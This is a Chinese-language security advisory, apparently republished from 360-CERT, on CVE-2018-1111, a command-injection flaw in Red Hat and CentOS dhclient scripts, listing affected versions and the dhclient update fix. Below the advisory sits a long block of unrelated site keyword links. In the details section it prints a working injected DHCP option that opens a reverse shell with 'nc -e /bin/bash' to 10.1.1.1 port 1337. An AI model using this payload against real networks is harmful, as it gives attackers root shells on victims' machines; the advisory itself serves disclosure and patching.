Red Hat DHCP客户端命令执行漏洞是怎么样的
发表于:2024-09-22 作者:千家信息网编辑
千家信息网最后更新 2024年09月22日,这篇文章给大家介绍Red Hat DHCP客户端命令执行漏洞是怎么样的,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。0x00 漏洞概述近日,红帽官方发布了安全更新,修复了编号为C
千家信息网最后更新 2024年09月22日Red Hat DHCP客户端命令执行漏洞是怎么样的
这篇文章给大家介绍Red Hat DHCP客户端命令执行漏洞是怎么样的,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。
0x00 漏洞概述
近日,红帽官方发布了安全更新,修复了编号为CVE-2018-1111的远程代码执行漏洞,攻击者可以通过伪造DHCP服务器发送响应包,攻击红帽系统,获取root权限并执行任意命令。
目前相关利用代码已经公开,可用于本地网络攻击;360-CERT此漏洞进行了技术分析,认为该漏洞危害等级严重,建议使用相关用户尽快进行更新。
0x01 漏洞影响面
影响版本
Red Hat Enterprise Linux Server 6
Red Hat Enterprise Linux Server 7
CentOS 6
CentOS 7
修复方案
受影响产品的更新
软件包更新
#yum update dhclient
#rpm -qa --changelog dhclient | grep CVE-2018
- Resolves: #1570898 - Fix CVE-2018-1111: Do not parse backslash as escape character
0x02 漏洞详情
DHCP 是一个局域网的网络协议,主要用于内部网络动态IP地址分配。
Red Hat提供的DHCP客户端软件包dhclient的脚本为/etc/NetworkManager/dispatcher.d/11-dhclient(Red Hat Enterprise Linux 7)和/etc/NetworkManager/dispatcher.d/10-dhclient(Red Hat Enterprise Linux 6);当NetworkManager组件从DHCP服务器收到DHCP响应时执行该脚本。
使用单引号使参数值逃逸成功,导致了命令执行
--dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #"
关于Red Hat DHCP客户端命令执行漏洞是怎么样的就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
漏洞
命令
更新
客户
客户端
网络
影响
攻击
代码
内容
更多
服务器
红帽
脚本
软件
软件包
帮助
服务
不错
安全
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
传奇数据库密码破解器
区域链游戏网络技术
数据库脱敏系统中标
服务器 开发流程
网络安全备份四个要素
ftp等服务器实现
软件开发立项建议书
榆林ar软件开发哪家好
杭州ktv服务器回收
软件开发合同的交付标准
数据库技术应用有哪些便利
网易我的世界20人服务器推荐
数据库的逻辑名称
相城区智能服务器价格咨询
对峙2出现无法连接服务器
住建网络安全自查情况报告
举例说明数据库逻辑独立性
财务如何做好安全和服务器
视觉上位机软件开发主要内容
河北科技大学网络安全大赛
威海启航网络技术有限公司
ps5 gt7 无法连接服务器
long类型在数据库中对应
区块链服务器安全方案
惠山代办网络技术工作室
大连海洋大学数据库sql
百度是什么类型的数据库
关于网络安全的论文8000字
数据库倒序排列
网络安全宣传周在哪里开展